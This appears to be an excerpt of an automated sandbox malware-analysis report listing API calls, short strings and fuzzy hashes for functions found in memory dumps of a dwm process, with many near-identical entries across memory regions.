                                                  • Instruction ID: d967b33acd7811386b22dd1252d36948949cb6c49b86d9aab2a7b77248e2a471
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: B3015732610EA0DAE714DFA6A80C18977B4F788F80B894035DB4983BA9DE35D056CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 3db3386ee1f72e4ed49c6479eba75fb857c08a44ca4b50c1aa7c66d5233b4831
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 5C015332610EA4DAF715DF66A80C24977B0F78EF80B894125DF4963B28DE39D095CB40
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000262F1CB28DF), ref: 00000262F1CB2A12
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 653f4f0914c688eb29a4e81553b9718cd1af230477c01f00c4b0e94771059d8d
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: 5091D032A10E70C9FB60DF65985C3AD3BB0F354B88F84412ADE4A97ED5DA36D44AC302
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000262F1D128DF), ref: 00000262F1D12A12
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 86db011425f7ecdf19b2137fbf6a699eadb0259b66c0baa7fcb7fc8920cba963
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: B891BE32710E64C9FB648F65945C3AD2BB1F358B98FA4410ADE4A77E99DB37C48AC700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 159d33562ee633f65dab8eb7953a72f3ce6f98d446c5ccc100398c868908d7a7
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: BA112736711F14CAEB00CFA0E8583A933B4F719758F840E31EA6D86BA4DF79C5688741
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 411a9e7592866da603d4734d1106ea9ab63259f73d38ae0ef92540677e624784
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: E3112A36710F24CAFB00CF60E8583A833B4F719758F840E21EA6D96BA4DB7DC1588740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 8775222173ae10e0894f2f42f16c5efeaca11e305c221ae0f841712a949e5fb3
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: 8C718136210FB1C1E7769E66997C3AA67B4F385BC4F84003ADD4A83FC9DA36C9099741
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: eb21b1db9d2890474daa364902e642c7e395f5cfca9bb353ebb377dcf9f0e0b1
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: 7C718076201FA1C6EB75DE2AA85C3AA6BB4F385FC4F84001ADD4953F8DDE76C6488740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448872342.00000262F1D31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D30000, based on PE: true
                                                  • Associated: 00000012.00000002.3448816247.00000262F1D30000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448971011.00000262F1D45000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449077595.00000262F1D50000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449181058.00000262F1D52000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449289748.00000262F1D59000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d30000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 95b4812c4243df05dd6c4af6569c302d9de3f2f76ec388ee9e0516f19df595d7
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: 8571B376600FA2D6EB75DF26995C3AA67B4F385BC4F85001ADE4943F88DE36C609C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1494451949.00000262F1EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F1EB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1eb0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3242871069-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 70927160c160e34a0cb1da599a096c52cb2cb07f4ed8cd495422a8d80dd537f9
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 3C519D32312E20CAEB54CF56E44CF6933F1E754B98F958525AA4A47F88DB7AC849C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1494451949.00000262F1EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F1EB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1eb0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 06b8a8ed03a40aba9fef35d76e367b5636339ae5a1880c122f8956085af7beb6
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 05618972508BD4C2EB65CF26E44879AB7F0F785B88F844215EB9907F99CB79C198CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 522cffc92ba39c9b59dda092ded2a90beb2573af3b1f17d97e46540ebe955f90
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: BE51C536204BB1C1E666DE25E46C3AA6B71F395B80F850039DD5983FD9DB3BCA08D742
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 533939c0233a0d39d731308ccfafa03c5104d3d9cb31c0c3b0f3074d03f90b96
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: 0E51B236205BA1D1EE249E2AA45C3AA6AB1F3D5F90FD4002DDE5953F9EDB3BC408C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 80e788c21a796cc57127bf29300a5be4cb479192ce7e77e3c9cffaf9cb26f3b8
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: 3441D032625EA0C6EB20DF25E44C79AA7B0F388784F800135EA4D87B98EB39D409CB41
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 9e24c2ba2fe726d1578a8802a969402f098f4396a69a128bfd88e7a6d3208572
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: BE41D232625EA4C6FB10CF65E44C79AA7B0F388794F944125EA4D97B98EB3AC449CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 1315abed5f45fb5d346567c6d5517bcfb200c912c5e6d1cd3f492e82422f88ec
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: B2115832215F9082EB618B25F428259B7F1F788B84F984224EF8D47BA9DF3DC955CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 56ae9dca0283ecd3853b444ed76c5aa75720ba9ac31bcefd39f9415ca68821c1
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: 41115832214F9482EB248B25F458249B7F5F788B88F984224EE8D07B68DF3DC555CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: f6524ad8902acd3490f1351edc8efdb5a53497a385106e658845b88c2dda419f
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: 2D11AD31A01F90C1EB16DBA6A80C29967B0F788FC0F984034DE4E93BA5EF39C4468341
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: 112342d7598463ab21077b981b0585c62388313cd7fa2dca443d2c3cd0195907
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: C0113931A01F94C5EA15DB6AA80C25977B4F789FD0F984128DE4E53B69EE39D4868700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 077aeb5079f5f357adfd9e4c988a9f976cf0db9caba8f44bc9b2e4d6c9b544b2
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: DCE06D31611A14DAE714CFA2D80C38936F1FB88F06F84C024C90947791EF7E849D8B41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 10b629e55c2da844159781a16f778e7fc57757d9263313839a744a0187929370
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: 03E03231B01A18DAF7298B62E80C34936F1EB8EB05F888124C90907760EF7E84DD8B80
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
